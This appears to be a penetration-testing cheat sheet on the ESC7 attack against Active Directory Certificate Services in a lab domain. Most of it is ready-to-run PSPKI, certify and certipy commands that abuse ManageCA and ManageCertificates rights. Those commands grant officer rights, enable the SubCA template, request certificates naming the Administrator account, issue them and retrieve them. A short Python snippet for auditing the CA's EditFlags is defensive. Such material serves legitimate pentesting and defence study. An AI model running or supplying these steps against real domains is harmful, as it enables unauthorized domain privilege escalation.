ESC7

Vulnerable Certificate Authority access control, where two sets of permissions pose security risks:

  • ManageCA (CA Administrator)
  • ManageCertificates (Certificate Manager)

Enumerate using certsrv.msc (GUI) or, from PowerShell, via PSPKI

PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-CertificationAuthorityAcl | select -expand Access

Query CA with certutil (EditFlags value)

Check whether EDITF_ATTRIBUTESUBJECTALTNAME2 is set: a value of 1376590 means it is.

PS /home/bobbuilder> certutil.exe -config "LAB-DC.minions.com\CA-minions" -getreg "policy\EditFlags"

Enumerate using PSPKI module

PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.minions.com | Get-CertificationAuthorityAcl | select -ExpandProperty access

Windows

Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2)

A principal holding ManageCA can change CA settings remotely using PSPKI, including toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (just like ESC6). This allows SAN specification in any template. The ESC6 attack was patched in May 2022, so Attack 2 may be a better alternative where that patch is in place.

Note: this will not have any effect until the CA service (CertSvc) is restarted, which ManageCA users are allowed to do but cannot do remotely.

  1. Request a certificate from a template that requires approval
     PS /home/bobbuilder> .\certify.exe request /ca:<ca_name> /template:ApprovalNeeded
  2. Import the PSPKI module
     PS /home/bobbuilder> Import-Module PSPKI
  3. Approve the pending request
     PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest
  4. Download the approved request
     PS /home/bobbuilder> .\certify.exe download /ca:<ca_name> /id:1

Post Attack

Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell

PS /home/bobbuilder> $ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
PS /home/bobbuilder> $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
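The EditFlags check above (1376590 means the SAN flag is set) and the 1114446 written back in the Post Attack step are the same DWORD with one bit toggled. The following added example, not part of the original page, decodes that bitmask so an auditor can see which EDITF_* bits are on, confirm whether EDITF_ATTRIBUTESUBJECTALTNAME2 is present, and compute the hardened value to write back. The sample certutil output is constructed and its exact layout is an assumption; the flag constants are the documented certsrv.h values.

```python
import re
# Flag values from Microsoft's certsrv.h; only the bits present in the
# page's two values (1114446 = 0x11014E default, 1376590 = 0x15014E)
# are listed, and any other bit is reported as UNKNOWN rather than dropped.
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000
EDIT_FLAGS = {
    0x00000002: "EDITF_REQUESTEXTENSIONLIST",
    0x00000004: "EDITF_DISABLEEXTENSIONLIST",
    0x00000008: "EDITF_ADDOLDKEYUSAGE",
    0x00000040: "EDITF_BASICCONSTRAINTSCRITICAL",
    0x00000100: "EDITF_ENABLEAKIKEYID",
    0x00010000: "EDITF_ENABLEDEFAULTSMIME",
    0x00040000: "EDITF_ATTRIBUTESUBJECTALTNAME2",
    0x00100000: "EDITF_ENABLECHASECLIENTDC",
}

# Constructed sample of `certutil -getreg policy\EditFlags` output; the
# exact layout of real certutil output is an assumption.
SAMPLE_CERTUTIL_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-minions\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
"""

def parse_certutil_getreg(output: str) -> int:
    """Extract the EditFlags DWORD (printed in hex) from certutil -getreg output."""
    m = re.search(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)", output)
    if not m:
        raise ValueError("EditFlags not found in certutil output")
    return int(m.group(1), 16)

def decode_edit_flags(value: int) -> list:
    """Names of the EDITF_* bits set in value (unknown bits shown as hex)."""
    return [EDIT_FLAGS.get(1 << b, f"UNKNOWN_0x{1 << b:08x}")
            for b in range(32) if value & (1 << b)]

def san_flag_enabled(value: int) -> bool:
    """True when requesters may supply arbitrary SANs via request attributes."""
    return bool(value & EDITF_ATTRIBUTESUBJECTALTNAME2)

def hardened_edit_flags(value: int) -> int:
    """Value to write back: the SAN bit cleared, every other flag preserved."""
    return value & ~EDITF_ATTRIBUTESUBJECTALTNAME2

def audit(output: str) -> dict:
    """One-shot check over certutil output, as a periodic audit script would run it."""
    value = parse_certutil_getreg(output)
    return {"value": value, "flags": decode_edit_flags(value),
            "san_enabled": san_flag_enabled(value), "hardened_value": hardened_edit_flags(value)}
```

Running `audit(SAMPLE_CERTUTIL_OUTPUT)` on the constructed sample reports the SAN flag as enabled and 1114446 as the hardened value, matching the SetConfigEntry call above.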

Attack 2 (gain ManageCertificates right using ManageCA)

For this attack we only need the ManageCA permission. We will also need the Manage Certificates permission and the SubCA certificate template enabled, but both can be enabled from ManageCA.

  1. Grant Manage Certificates access (optional, if we don't already have it)
     PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -add-officer user1 -username user1@minions.com -password password1
  2. Enable the SubCA certificate template (optional, the SubCA template is enabled by default)
     PS /home/bobbuilder> .\certipy.exe ca -username user1@minions.com -password password1 -target-ip <ip> -ca '<ca_name>' -enable-template 'SubCA'
  3. Request a certificate based on the SubCA template
     PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template SubCA -upn administrator@minions.com
  4. Issue the failed (pending) request
     PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -issue-request 1 -username user1@minions.com -password password1
  5. Retrieve the issued certificate
     PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -retrieve 1

Linux

Attack 1 (ManageCA rights)

  1. Add Manage Certificates access rights to the controlled principal (user1 here)
     bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -add-officer user1
  2. Request a certificate with a SAN (the SubCA template has Enrollee Supplies Subject: True)
     bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template SubCA -upn Administrator
  3. Issue the certificate
     bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 1
  4. Retrieve the issued certificate by request ID to authenticate with it
     bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 1

Attack 2 (ManageCertificates rights)

  1. Request a certificate from a template that requires manager approval
     bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template <template> -upn Administrator
  2. Approve the pending request
     bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 1
  3. Retrieve the approved request
     bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 1